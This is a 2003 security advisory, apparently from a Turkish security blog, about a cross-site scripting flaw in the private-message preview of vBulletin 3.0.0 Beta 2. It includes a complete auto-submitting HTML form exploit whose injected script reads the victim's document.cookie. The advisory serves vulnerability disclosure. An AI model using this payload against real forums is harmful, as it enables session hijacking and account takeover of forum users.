Vbulletin XSS
18.05.2003
Okuyucu : 49.702
Günlük Okuyucu : 27,2
Okuyucu : 49.702
Günlük Okuyucu : 27,2
------------------------------------------------------ VBulletin Private Message "Preview Message" XSS Vulnerability 14.05.2003 ------------------------------------------------------ Any kind of XSS attacks possibility. Account-Session hijacking. ------------------------------------------------------ About VBulletin; ------------------------------------------------------ PHP Based Popular Forum Application Vendor & Demo; www.vbulletin.com ------------------------------------------------------ Vulnerable; ------------------------------------------------------ vBulletin 3.0.0 Beta 2 ------------------------------------------------------ Non Vulnerable; ------------------------------------------------------ vBulletin 2.2 ------------------------------------------------------ Vendor Status; ------------------------------------------------------ Patched; This version of Vbulletin not published public yet but some of Vbulletin customers like www.sitepointforums.com (More than 23.000 members) using this. ------------------------------------------------------ Solution; ------------------------------------------------------ HTML Encoding like post thread preview page. ------------------------------------------------------ Exploit Code; ------------------------------------------------------ [html] [body] [form action="http://[victim]/forum/private.php" method="post" name="vbform"] [input type="hidden" name="do" value="insertpm" /] [input type="hidden" name="pmid" value="" /] [input type="hidden" name="forward" value="" /] [input type="hidden" name="receipt" value="0" /] [input type="text" class="bginput" name="title" value="" size="40" tabindex="2" /] [textarea name="message" rows="20" cols="70" wrap="virtual" tabindex="3"][/textarea] [input type="submit" class="button" name="sbutton" value="Post Message" accesskey="s" tabindex="4" /] [input type="submit" class="button" value="Preview Message" accesskey="p" name="preview" onclick="this.form.dopreview = true; return true;this.form.submit()" tabindex="5" ] [input type="checkbox" name="savecopy" value="1" id="cb_savecopy" checked="checked" /] [input type="checkbox" name="signature" value="1" id="cb_signature" /] [input type="checkbox" name="parseurl" value="1" id="cb_parseurl" checked="checked" /] [input type="checkbox" name="disablesmilies" value="1" id="cb_disablesmilies" /] [/form] [script] //Set Values and Submit // You can write your own JS codes var xss = "\"][script]alert(document.cookie)[\/script]"; document.vbform.title.value=xss; document.vbform.preview.click(); [/script] [/body] [/html] *Replace ([],<>) **You may need login first
Yorumlar
Yorum Ekle
Diğer Yazılar
Vedat Yigitoglu, Economics, Ekonomi
Verisign IDefense' i satın aldı
Victim.com
View-Source[fm] - Bookmarklet
Vikipedi
Visa cuts CardSystems over security breach
Visio ve Office XML Şemaları
Visionic Pc-188 Webcam
Vista Compatibility Files
Vista' da Güvenli Kod Yazmak
Vista Saygıda Kusur Ediyor
Vista TCP/IP Limitlerini ve HIzlı Port Tarayıcılar
Vista ve User Account Control - Protected Mode
Visual Basic 2005 - A Developer's Notebook (Developer's Notebook)
Visual Basic 2008 !
Visual Basic Filmleri
Visual Basic Scripting ile Header Bilgileri Alma
Visual Basic ve Genel Dillerde Boolean Atraksiyonları
Visual Studio ' da Pratik Kod Paylaşımı
Neredeyim ?
Ferruh.Mavituna » Advisories » Vbulletin XSS